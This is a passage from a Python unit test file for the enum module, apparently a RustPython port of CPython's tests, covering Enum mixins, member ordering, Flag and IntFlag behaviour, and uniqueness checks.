self.assertEqual(ReformedColor.RED.behavior(), 'booyah')
self.assertEqual(ReformedColor.RED.social(), "what's up?")
self.assertTrue(issubclass(ReformedColor, int))
def test_multiple_inherited_mixin(self):
class StrEnum(str, Enum):
def __new__(cls, *args, **kwargs):
for a in args:
if not isinstance(a, str):
raise TypeError("Enumeration '%s' (%s) is not"
" a string" % (a, type(a).__name__))
return str.__new__(cls, *args, **kwargs)
@unique
class Decision1(StrEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
class MyEnum(StrEnum):
pass
@unique
class Decision2(MyEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
def test_multiple_mixin_inherited(self):
class MyInt(int):
def __new__(cls, value):
return super().__new__(cls, value)
class HexMixin:
def __repr__(self):
return hex(self)
class MyIntEnum(HexMixin, MyInt, enum.Enum):
pass
class Foo(MyIntEnum):
TEST = 1
self.assertTrue(isinstance(Foo.TEST, MyInt))
self.assertEqual(repr(Foo.TEST), "0x1")
class Fee(MyIntEnum):
TEST = 1
def __new__(cls, value):
value += 1
member = int.__new__(cls, value)
member._value_ = value
return member
self.assertEqual(Fee.TEST, 2)
def test_empty_globals(self):
# bpo-35717: sys._getframe(2).f_globals['__name__'] fails with KeyError
# when using compile and exec because f_globals is empty
code = "from enum import Enum; Enum('Animal', 'ANT BEE CAT DOG')"
code = compile(code, "<string>", "exec")
global_ns = {}
local_ls = {}
exec(code, global_ns, local_ls)
class TestOrder(unittest.TestCase):
def test_same_members(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
def test_same_members_with_aliases(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
verde = green
def test_same_members_wrong_order(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
blue = 3
green = 2
def test_order_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
def test_order_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
verde = green
def test_enum_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
def test_enum_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
verde = green
class TestFlag(unittest.TestCase):
"""Tests of the Flags."""
class Perm(Flag):
R, W, X = 4, 2, 1
class Open(Flag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(Flag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.0')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: 3>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: 5>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: 6>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: 1>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: 7>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: 524291>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: 524290>')
self.assertEqual(repr(~Open.AC), '<Open.CE: 524288>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC: 3>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: 2>')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), 'Perm.R')
self.assertEqual(format(Perm.R | Perm.X, ''), 'Perm.R|X')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i | j), Perm(i.value | j.value))
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for i in Perm:
self.assertIs(i | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual((i & j).value, i.value & j.value)
self.assertIs(type(i & j), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & RWX, i)
self.assertIs(RWX & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for i in Perm:
self.assertIs(i ^ Perm(0), i)
self.assertIs(Perm(0) ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_programmatic_function_string(self):
Perm = Flag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_string_with_start(self):
Perm = Flag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_string_list(self):
Perm = Flag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_iterable(self):
Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_from_dict(self):
Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_pickle(self):
if isinstance(FlagStooges, Exception):
raise FlagStooges
test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
test_pickle_dump_load(self.assertIs, FlagStooges)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
with self.assertRaises(TypeError):
'BLACK' in Color
with self.assertRaises(TypeError):
'RO' in Open
with self.assertRaises(TypeError):
1 in Color
with self.assertRaises(TypeError):
1 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
def test_auto_number(self):
class Color(Flag):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 4)
def test_auto_number_garbage(self):
with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
class Color(Flag):
red = 'not an int'
blue = auto()
def test_cascading_failure(self):
class Bizarre(Flag):
c = 3
d = 4
f = 6
# Bizarre.c | Bizarre.d
# each invalid value is looked up twice: the first failure must not leave
# a cached bogus member behind (hence the duplicated asserts below)
self.assertRaisesRegex(ValueError, "5 is not a valid Bizarre", Bizarre, 5)
self.assertRaisesRegex(ValueError, "5 is not a valid Bizarre", Bizarre, 5)
self.assertRaisesRegex(ValueError, "2 is not a valid Bizarre", Bizarre, 2)
self.assertRaisesRegex(ValueError, "2 is not a valid Bizarre", Bizarre, 2)
self.assertRaisesRegex(ValueError, "1 is not a valid Bizarre", Bizarre, 1)
self.assertRaisesRegex(ValueError, "1 is not a valid Bizarre", Bizarre, 1)
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_bizarre(self):
class Bizarre(Flag):
b = 3
c = 4
d = 6
self.assertEqual(repr(Bizarre(7)), '<Bizarre.d|c|b: 7>')
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(AllMixin, StrMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(sys.platform == "win32", "TODO: RUSTPYTHON, inconsistent test result on Windows due to threading")
@support.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(Flag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with support.start_threads(threads):
pass
# 256 distinct values seen: the 8 canonical members plus 248 composites
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
X = 1 << 0
W = 1 << 1
R = 1 << 2
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(IntFlag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
def test_type(self):
Perm = self.Perm
self.assertTrue(Perm._member_type_ is int)
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm.R | 8), 'Perm.8|R')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(Perm(8)), 'Perm.8')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.-8')
self.assertEqual(str(~(Perm.R | 8)), 'Perm.W|X')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
self.assertEqual(str(Perm(~8)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(Open(4)), 'Open.4')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC|RW|WO')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(str(Open(~4)), 'Open.CE|AC|RW|WO')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm.R | 8), '<Perm.8|R: 12>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(8)), '<Perm.8: 8>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: -5>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: -3>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: -2>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: -7>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.-8: -8>')
self.assertEqual(repr(~(Perm.R | 8)), '<Perm.W|X: -13>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: -1>')
self.assertEqual(repr(Perm(~8)), '<Perm.R|W|X: -9>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(Open(4)), '<Open.4: 4>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: -1>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: -2>')
self.assertEqual(repr(~Open.AC), '<Open.CE: -4>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC|RW|WO: -524289>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: -524290>')
self.assertEqual(repr(Open(~4)), '<Open.CE|AC|RW|WO: -5>')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), '4')
self.assertEqual(format(Perm.R | Perm.X, ''), '5')
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i | j, i.value | j.value)
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for j in range(8):
self.assertEqual(i | j, i.value | j)
self.assertEqual((i | j).value, i.value | j)
self.assertIs(type(i | j), Perm)
self.assertEqual(j | i, j | i.value)
self.assertEqual((j | i).value, j | i.value)
self.assertIs(type(j | i), Perm)
for i in Perm:
self.assertIs(i | i, i)
self.assertIs(i | 0, i)
self.assertIs(0 | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
for j in range(8):
self.assertEqual(i & j, i.value & j)
self.assertEqual((i & j).value, i.value & j)
self.assertIs(type(i & j), Perm)
self.assertEqual(j & i, j & i.value)
self.assertEqual((j & i).value, j & i.value)
self.assertIs(type(j & i), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & 7, i)
self.assertIs(7 & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i ^ j, i.value ^ j.value)
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for j in range(8):
self.assertEqual(i ^ j, i.value ^ j)
self.assertEqual((i ^ j).value, i.value ^ j)
self.assertIs(type(i ^ j), Perm)
self.assertEqual(j ^ i, j ^ i.value)
self.assertEqual((j ^ i).value, j ^ i.value)
self.assertIs(type(j ^ i), Perm)
for i in Perm:
self.assertIs(i ^ 0, i)
self.assertIs(0 ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertEqual(~i, ~i.value)
self.assertEqual((~i).value, ~i.value)
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_programmatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_programmatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertFalse(Color.GREEN in Open)
self.assertFalse(Open.RW in Color)
with self.assertRaises(TypeError):
'GREEN' in Color
with self.assertRaises(TypeError):
'RW' in Open
with self.assertRaises(TypeError):
2 in Color
with self.assertRaises(TypeError):
2 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
with self.assertRaises(TypeError):
self.assertFalse('test' in RW)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(AllMixin, StrMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(sys.platform == "win32", "TODO: RUSTPYTHON, inconsistent test result on Windows due to threading")
@support.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(IntFlag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with support.start_threads(threads):
pass
# 256 distinct values seen: the 8 canonical members plus 248 composites
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestEmptyAndNonLatinStrings(unittest.TestCase):
def test_empty_string(self):
with self.assertRaises(ValueError):
empty_abc = Enum('empty_abc', ('', 'B', 'C'))
def test_non_latin_character_string(self):
greek_abc = Enum('greek_abc', ('\u03B1', 'B', 'C'))
item = getattr(greek_abc, '\u03B1')
self.assertEqual(item.value, 1)
def test_non_latin_number_string(self):
hebrew_123 = Enum('hebrew_123', ('\u05D0', '2', '3'))
item = getattr(hebrew_123, '\u05D0')
self.assertEqual(item.value, 1)
class TestUnique(unittest.TestCase):
def test_unique_clean(self):
@unique
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
@unique
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@unique
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@unique
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@unique
class Silly(Enum):
one = 1
